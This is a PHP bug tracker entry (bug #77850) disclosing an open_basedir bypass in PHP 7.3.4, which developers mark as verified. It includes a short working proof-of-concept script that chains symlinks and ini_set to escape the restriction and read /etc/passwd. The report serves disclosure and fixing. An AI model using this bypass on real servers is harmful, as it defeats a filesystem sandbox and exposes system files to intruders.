php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #77850 Open_basedir bypass
Submitted: 2019-04-05 04:48 UTC Modified: 2019-06-18 05:47 UTC
Votes:6
Avg. Score:3.7 ± 1.5
Reproduced:1 of 2 (50.0%)
Same Version:1 (100.0%)
Same OS:0 (0.0%)
From: simon dot vikstrom at gmail dot com Assigned:
Status: Verified Package: *Directory/Filesystem functions
PHP Version: 7.3.4 OS: Linux
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: simon dot vikstrom at gmail dot com
New email:
PHP Version: OS:

 

 [2019-04-05 04:48 UTC] simon dot vikstrom at gmail dot com 
Description:
------------
Blaklis_ on twitter published a open_basedir bypass :

https://twitter.com/Blaklis_/status/1113866828739166208



Test script:
---------------
<?php

/*

I could recreat with:

mkdir -p /var/www/html
chmod -R YOURUSER:YOURUSER /var/www 
cd /var/www/html/
php  -d open_basedir=/var/www FILENAME.php

*/

mkdir('/var/www/html/a/b/c/d/e/f/g/',0777,TRUE);
symlink('/var/www/html/a/b/c/d/e/f/g','foo');
ini_set('open_basedir','/var/www/html:bar/');
symlink('foo/../../../../../../','bar');
unlink('foo');
symlink('/var/www/html/','foo');
echo file_get_contents('bar/etc/passwd');


Expected result:
----------------
file_get_contents(): open_basedir restriction in effect.  ....

Actual result:
--------------
Reads /etc/passwd

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-05-07 09:48 UTC] sjon@php.net
-Status: Open +Status: Verified
 [2019-05-07 09:48 UTC] sjon@php.net 
I can confirm this issue - see https://3v4l.org/75AX0
 [2019-06-18 05:47 UTC] jhdxr@php.net 
related discussion: https://externals.io/message/105606
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Thu Nov 21 19:01:29 2024 UTC